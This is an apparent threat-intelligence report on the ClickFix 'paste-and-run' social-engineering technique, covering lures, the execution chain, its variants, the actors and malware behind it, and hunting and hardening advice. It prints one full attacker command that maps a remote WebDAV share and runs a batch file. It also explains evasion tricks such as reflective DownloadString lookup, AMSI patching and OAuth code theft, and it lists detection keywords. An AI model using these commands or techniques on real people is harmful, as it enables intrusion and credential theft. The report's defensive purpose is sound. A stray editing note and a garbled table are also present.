The landscape of cyber threat activity between 2024 and 2026 has been fundamentally reshaped by the emergence and rapid maturation of the ClickFix social engineering technique. This methodology represents a significant departure from traditional automated exploitation or simple credential phishing, moving instead toward a model of "interaction-driven exploitation" where the victim is psychologically steered into becoming the primary execution mechanism for malicious code. By weaponizing the inherent trust users place in native operating system utilities and their familiarity with routine digital hurdles—such as CAPTCHAs and browser update prompts—threat actors have successfully bypassed the vast majority of traditional, automated security perimeters. This report provides an exhaustive technical and strategic deep dive into the ClickFix phenomenon, tracing its origins with initial access brokers like TA571, its technological evolution through variants like CrashFix and ConsentFix, and its role as a centerpiece in the industrialization of the modern cybercrime-as-a-service ecosystem.
The rise of ClickFix is best understood as a reaction to the increasing efficacy of browser-based sandboxing, email gateway filtering, and automated sandbox analysis of suspicious attachments. As these defensive technologies matured, the "cost per successful infection" for traditional malware delivery rose significantly. ClickFix effectively resets this economic equation for attackers by shifting the burden of execution from the malware to the user. In this paradigm, the malware itself is often "fileless" during the delivery phase, existing only as a string of text on the system clipboard until the user manually pastes it into a trusted system utility.
The technique’s prevalence is reflected in the staggering growth rates reported by global telemetry sources. Between the second half of 2024 and the first half of 2025, security researchers observed a 517% surge in ClickFix and related "FakeCaptcha" attacks, which now account for nearly 8% of all blocked initial access attempts. This growth is not merely quantitative but qualitative, as the technique has transitioned from a niche tactic used by sophisticated actors into an industrialized service offered via turnkey kits to a wide array of cybercriminal affiliates.
The evolution of ClickFix demonstrates a remarkable rate of adaptation, with threat actors frequently rotating lures and execution methods to stay ahead of behavioral detection patterns.
March 2024: First annotated emergence using HTML attachments and "Word Online" lures. (Primary Actor: TA571; Observed Payloads: DarkGate, AsyncRAT)
April 2024: Integration with the ClearFake JavaScript framework for web-based delivery. (Primary Actors: TA571, ClearFake; Observed Payloads: Lumma Stealer)
May 2024: Introduction of the "Etherhiding" technique using Binance Smart Chain smart contracts. (Primary Actor: ClearFake; Observed Payloads: Emmenhtal Loader, Lumma)
August 2024: Diversification into Google Meet and Facebook-themed lures for credential/token theft. (Primary Actors: Slavic Nation Empire, Scamquerteo; Observed Payloads: Infostealers, Drainers)
January 2026: Emergence of "CrashFix" variant utilizing browser DoS and finger.exe abuse. (Primary Actor: KongTuke; Observed Payloads: ModelorRAT, Python-based RATs)
February 2026: Implementation of "ConsentFix" browser-native OAuth hijacking. (Primary Actor: Storm-1607; Observed Payloads: Cloud Identity Access)
March 2026: Discovery of WebDAV/net use variant modifying Electron app bundles (WorkFlowy). (Primary Actor: Atos Researchers; Observed Payloads: C2 Beacons, Droppers) .
The success of ClickFix is predicated on a deep understanding of human-computer interaction (HCI) and the psychological triggers that drive user behavior in high-pressure or routine environments. Unlike traditional phishing, which may attempt to entice a user to download a file, ClickFix mimics the "friction" that users are already accustomed to navigating. By presenting a technical problem that requires a "fix," the attacker assumes the role of an authoritative guide rather than a suspicious solicitor.
Threat actors have developed a sophisticated taxonomy of lures, each designed to exploit a specific user expectation or professional anxiety. These lures are not static; they are interactive, responsive, and frequently use localized language to enhance credibility.
The most common ClickFix iteration involves a counterfeit human verification prompt. By mirroring the aesthetics of Cloudflare Turnstile or Google reCAPTCHA, attackers tap into the user’s "verification reflex"—the habit of clicking through security checks to reach content. In this scenario, the user believes they are proving their humanity, while they are actually authorizing the first stage of code execution.
Targeting the corporate environment, ClickFix often impersonates shared productivity tools like Microsoft Teams, OneDrive, or Google Meet. A common scenario involves a prompt stating that a document cannot be displayed because a specific extension, such as "Word Online," is missing. This creates a sense of professional urgency; the user needs to view the document to complete a task, and the "How to fix" instructions provide a seemingly official path to resolution.
A more aggressive evolution, seen in the CrashFix variant, involves actually disrupting the user's experience. By using a malicious extension to force a browser crash, the attacker creates a genuine technical problem. The subsequent "fix" prompt is then perceived not as a suspicious external offer, but as a necessary system recovery step. This transition from "invented problem" to "actual disruption" marks a significant escalation in the coercive power of the social engineering lure.
The technical execution of ClickFix is a multi-stage process that bridges the gap between the untrusted browser environment and the trusted host operating system. The sophistication lies in how the transition is handled without triggering the security warnings typically associated with file downloads or external protocol handlers.
ClickFix attacks typically begin with the compromise of a legitimate website, frequently via vulnerable WordPress plugins or themes. The injected JavaScript performs a series of environmental checks to ensure the attack only proceeds on a viable target. This includes detecting the operating system (Windows vs. macOS) and browser type, as well as attempting to identify if the user is a security researcher or an automated bot.
In advanced campaigns, such as those employing "Etherhiding," the JavaScript does not contain the final malicious payload. Instead, it fetches the next-stage command from a smart contract on the Binance Smart Chain. This decentralized hosting strategy ensures that the command can be updated centrally across thousands of infected sites and is resistant to traditional domain-based takedowns.
Once the user interacts with the lure (e.g., clicking a "Verify" button), the JavaScript invokes the navigator.clipboard.writeText() method. This silently overwrites the user's clipboard with a malicious command, such as a PowerShell one-liner or an mshta call. Because this action is triggered by a user click, browsers generally do not flag it as suspicious, as clipboard access is a standard feature for many legitimate web applications.
The most critical—and most deceptive—part of the attack is the set of instructions provided to the user. The lure displays a three-step guide:
Windows Key + R: Opens the native Windows Run dialog.
CTRL + V: Pastes the malicious command from the clipboard.
Enter: Executes the command.
By splitting the execution across these three manual steps, the attacker ensures that no single action appears malicious to automated endpoint defenses. The Run dialog is a trusted system component, and the act of pasting and pressing Enter is a quintessentially human action that bypasses the "suspicious parent process" rules often applied to automated script execution.
Once the user presses Enter, the attack moves into the host execution phase. ClickFix actors demonstrate a mastery of "Living-off-the-Land" (LotL) techniques, using pre-installed Windows utilities to download and execute final payloads in a "fileless" manner.
PowerShell is the most frequently abused utility in ClickFix campaigns. Attackers utilize several layers of obfuscation to hide the intent of the PowerShell command.
Rather than calling suspicious methods like DownloadString directly, ClickFix scripts often use "fuzzy logic" and reflection to find these methods at runtime. A common technique involves creating a Net.WebClient object and then using Get-Member (aliased as gm) to list all available methods. The script then filters these methods using a wildcard match, such as -clike "*wn*g", to identify and invoke DownloadString without ever including the full string in the command line.
The downloaded payload is frequently a secondary PowerShell script or a DLL that is loaded directly into memory using the Invoke-Expression (iex) command or reflective DLL injection. In some cases, the script will also attempt to modify clr.dll in memory to disable the Antimalware Scan Interface (AMSI), ensuring that subsequent stages of the script are not inspected by local antivirus engines.
The use of mshta.exe allows attackers to execute scripts hosted on remote servers as if they were local HTML applications. However, as EDR solutions have begun to flag explorer.exe spawning mshta.exe, threat actors have developed more evasive proxy execution chains.
A notable 2026 evolution involves the abuse of SyncAppvPublishingServer.vbs, a legitimate Windows script used for application virtualization. Attackers use WScript.exe to call this script, passing a malicious PowerShell command as an argument. Because SyncAppvPublishingServer.vbs is a trusted Microsoft-signed script, its execution of a sub-process is less likely to trigger high-severity alerts than a direct call to PowerShell from the Run dialog.
The most sophisticated host-level variant identified in early 2026 eschews script interpreters entirely in the initial stage. This variant uses the net use command to map a remote WebDAV share from an attacker-controlled server to a local drive letter (e.g., Z:). It then executes a batch file (.cmd) directly from that mapped drive.
$$\text{Initial Command: } cmd.exe \ /c \ net \ use \ Z: \ [http://94.156.170](http://94.156.170)[.]255/webdav \ /persistent:no \ \&\& \ Z:\update.cmd \ \& \ net \ use \ Z: \ /delete$$
This method is highly effective because it leverages standard network file access protocols. The "infection" occurs through the execution of a file on a "local" drive, which many security products treat with less suspicion than a file downloaded from the public internet.
As the ClickFix technique has matured, several distinct "brands" of the attack have emerged, each targeting a different vulnerability in the user experience or the system's trust model.
The FileFix variant, first observed in mid-2024 and heavily utilized by ransomware affiliates like Interlock, shifts the interaction from the Run dialog to Windows File Explorer. In this scenario, the user is tricked into clicking a button that opens a standard "Upload File" window. The instructions then guide the user to press CTRL + L to focus on the address bar and CTRL + V to paste the command.
This variant is particularly insidious because users are less conditioned to view the File Explorer address bar as a potential execution vector. Furthermore, the address bar in File Explorer can execute certain commands directly or navigate to remote shares, making it a powerful and under-monitored tool for initial access.
CrashFix represents a more proactive form of social engineering. By deliberately crashing the victim's browser using a malicious extension, the attacker forces a moment of technical vulnerability and frustration. The "Fix It" prompt that appears upon browser restart is framed as a remediation for a genuine system failure.
Technically, CrashFix has been observed abusing finger.exe, a legacy utility for retrieving user information from remote hosts. The utility is used as a proxy to exfiltrate system metadata (network configuration, process lists, domain membership) to the attacker's server by encoding the data into the query string.
ConsentFix is perhaps the most significant evolution, as it moves the entire attack into the browser context to target cloud identity. Instead of delivering host-based malware, ConsentFix hijacks OAuth tokens.
The attack flow targets the implicit trust of first-party Microsoft applications, such as the Azure CLI.
Watering Hole Access: The victim arrives via a SEO-poisoned search result.
Conditional Loading: The page uses a fake Cloudflare Turnstile to filter out bots and researchers.
Legitimate Login: The "Sign In" button opens a real Microsoft login page.
The Localhost Redirect: After a successful login, the user is redirected to a localhost URL, which is a standard part of the OAuth authorization code flow for desktop applications.
The Fix: The lure tricks the user into copying this localhost URL (which contains the sensitive authorization code) and pasting it back into the attacker's page.
Because the victim is interacting with a legitimate Microsoft login session, MFA and passkeys are ineffective—the attacker is stealing the resulting authorization, not the credentials. By targeting the Azure CLI, the attacker gains broad, tenant-wide permissions that are often excluded from stricter Conditional Access policies.
The infrastructure supporting ClickFix campaigns has evolved to be as resilient as the social engineering lures are deceptive. Attackers utilize a combination of compromised legitimate sites, decentralized hosting, and advanced obfuscation to ensure the longevity of their campaigns.
[EDIT HERE - Fix table]
The use of the Binance Smart Chain (BSC) to host ClickFix commands—the "Etherhiding" technique—represents a significant leap in C2 resilience.
Contract FunctionRole in CampaignDefensive Challengeset()Used by the attacker to store the latest malicious command on the blockchain.
Content cannot be "deleted" or "taken down" by third parties.
get()Invoked by the compromised website's JavaScript to retrieve the command.
Legitimate Web3 traffic is often unmonitored by corporate firewalls.
checkUUID()Checks if a specific victim machine has already been infected.
Prevents redundant infections and reduces the volume of detectable activity.
.
To evade network-level inspection and static file analysis, ClickFix payloads often employ steganography. In some observed campaigns, the final malware stages are concealed within an image file (.gz or .bin). The JavaScript on the landing page then uses a series of functions—such as hexToKey, b64ToUint8Array, and xorDecode—to decrypt the image data in the browser's memory.
The decrypted code is then injected into the page using a Blob URL. This technique allows the script to be executed as an in-memory resource (blob:http://[site]/[uuid]), which leaves no trace on the host's file system and is invisible to most traditional web filters.
The WorkFlowy variant identified in 2026 demonstrates an advanced persistence technique involving the modification of Electron application bundles. Electron apps use .asar archives to store their source code. Attackers have been observed replacing the legitimate main.js inside these archives with a heavily obfuscated version that includes a C2 beacon loop.
Because the malicious code is executed as part of a legitimate, signed application (like WorkFlowy), it inherits the application's reputation and permissions. Furthermore, because the malicious main.js uses an infinite loop (await f()) that never resolves, the legitimate application functionality is blocked, effectively "hiding" the malware behind a non-responsive but trusted process.
ClickFix has become a "Swiss Army knife" for both sophisticated state-sponsored groups and opportunistic cybercriminal affiliates. The technique's versatility makes it an ideal choice for initial access brokers who need to deliver a wide variety of payloads across different target environments.
TA571 is the primary innovator and most prolific user of ClickFix. As a high-volume spam distributor, TA571 operates as an Initial Access Broker (IAB), selling access to compromised systems to other threat groups, including ransomware affiliates. Their campaigns are notable for their scale, frequently exceeding 100,000 messages and targeting a global footprint of organizations.
State-sponsored groups have integrated ClickFix into their espionage and financial theft operations.
Lazarus Group and Kimsuky (DPRK): Use ClickFix lures to distribute remote access tools (RATs) to bypass the high-security environments often found in financial and defense sectors.
APT28 (Russia): Has been observed using ClickFix baiting as part of targeted spear-phishing campaigns against government and diplomatic targets.
MuddyWater (Iran): Leverages ClickFix to gain initial access in regional conflicts, using the technique to deliver bespoke implants.
ClickFix is a "payload-agnostic" delivery mechanism. The choice of final malware is dictated by the attacker's objectives, ranging from rapid data theft to long-term persistence and lateral movement.
Malware FamilyPrimary RoleKey Features in ClickFix ContextLumma StealerInfostealer
Most frequent payload; exfiltrates browser cookies, passwords, and crypto wallets.
DarkGateLoader / RAT
Multi-functional; supports keylogging, crypto mining, and secondary payload delivery.
Matanbuchus 3.0MaaS Loader
Uses MSI-based silent installation and DLL sideloading via Zillya Antivirus binaries.
RhadamanthysModular Stealer
Features AI-driven OCR to extract crypto seed phrases from stored images.
NetSupport RATPersistence
Abuse of a legitimate RMM tool to provide "hands-on-keyboard" access.
DanaBotBanking Trojan
Delivers targeted payloads to transport, logistics, and hospitality organizations.
AstarionRATCustom Implant
Custom RAT with 24 commands, RSA-encrypted C2, and SOCKS5 proxy capabilities.
.
Defending against ClickFix requires a paradigm shift in security operations. Because the attack chain is built on legitimate user actions and trusted system tools, traditional "block-list" approaches are insufficient. Organizations must adopt a "Behavioral Defense-in-Depth" model.
Detection efforts should focus on identifying the "interaction artifacts" that ClickFix leaves behind in system logs and telemetry.
The use of the Windows Run dialog leaves traces in the RunMRU registry key.
Hunting Query: Monitor the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key for new entries containing keywords like powershell, mshta, cmd /c, or wscript.
Sigma Rule Strategy: Alert on explorer.exe as a parent process spawning a scripting interpreter without a corresponding script file on disk.
Detailed logging of PowerShell activity is essential for de-obfuscating ClickFix commands.
Script Block Logs (4104): Hunt for scripts that use Get-Member (or gm) in combination with -like or -clike operators to dynamically find the DownloadString method.
AMSI Modification: Alert on script blocks that reference clr.dll and memory protection constants such as 0x40 (PAGE_EXECUTE_READWRITE) or 0x1000 (MEM_COMMIT), which are indicators of an AMSI bypass attempt.
At the browser level, defenses should be proactive rather than reactive.
Clipboard Monitoring: Use browser security extensions or agents that can detect and block navigator.clipboard.writeText calls on sites with low reputation or suspicious JavaScript patterns.
Remote Debugging: Monitor for the execution of browser processes (Chrome, Edge) with the --remote-debugging- flag, a common technique for exfiltrating session tokens without triggering standard security alerts.
Blockchain Endpoints: Restrict outbound traffic to known Web3 and blockchain endpoints (e.g., bnbchain.org) for non-technical users to disrupt the "Etherhiding" payload retrieval mechanism.
Technical controls can effectively break the ClickFix execution chain by restricting the utilities and interactions the attack relies on.
Restrict PowerShell: Enforce the PowerShell Execution Policy to AllSigned or Restricted and consider using PowerShell Constrained Language Mode for standard users.
Binary Hardening: Use Windows Defender Application Control (WDAC) to define trusted paths and block the execution of LOLBins like mshta.exe, certutil.exe, or finger.exe when launched from suspicious parent processes or by non-administrative users.
UI Restriction: For high-risk user groups, consider disabling the Windows + R (Run) shortcut via Group Policy to eliminate the primary ClickFix interface.
OAuth Scoping: In Microsoft Entra ID (Azure AD), create Service Principals for vulnerable first-party apps like the Azure CLI and restrict access to only authorized administrators. Enable logging for AADGraphActivityLogs to detect attempts to abuse legacy or undocumented scopes.
Traditional security awareness training must be updated to address the specific lures of ClickFix.
Questioning the "Fix": Employees should be taught that legitimate technical issues in browsers or productivity tools will never be resolved by asking a user to copy and paste a command into the Run dialog.
Simulated Lures: Include "Paste-and-Run" scenarios in phishing simulations to identify users who are susceptible to the compliance reflex and provide them with targeted remediation.
The rapid evolution of ClickFix between 2024 and 2026 suggests a future where initial access is increasingly a product of "interaction engineering". As AI and automation lower the barrier for creating hyper-realistic lures and localized scripts, the volume of these attacks is expected to continue its upward trajectory.
The "ConsentFix" variant highlights a broader shift toward targeting cloud-native identity rather than the endpoint. In this future, the battle for security will be fought not just in the kernel or the file system, but in the browser context and the user's perception of "normal" digital interaction. Organizations that fail to monitor the boundary between the untrusted web and the trusted operating system interface will remain vulnerable to this highly adaptive and effective social engineering paradigm.
Ultimately, ClickFix is a reminder that the human element remains the most versatile—and the most exploited—component of the modern security stack. The industrialization of these techniques via "kits" and "access brokers" ensures that ClickFix will remain a persistent and evolving threat for the foreseeable future.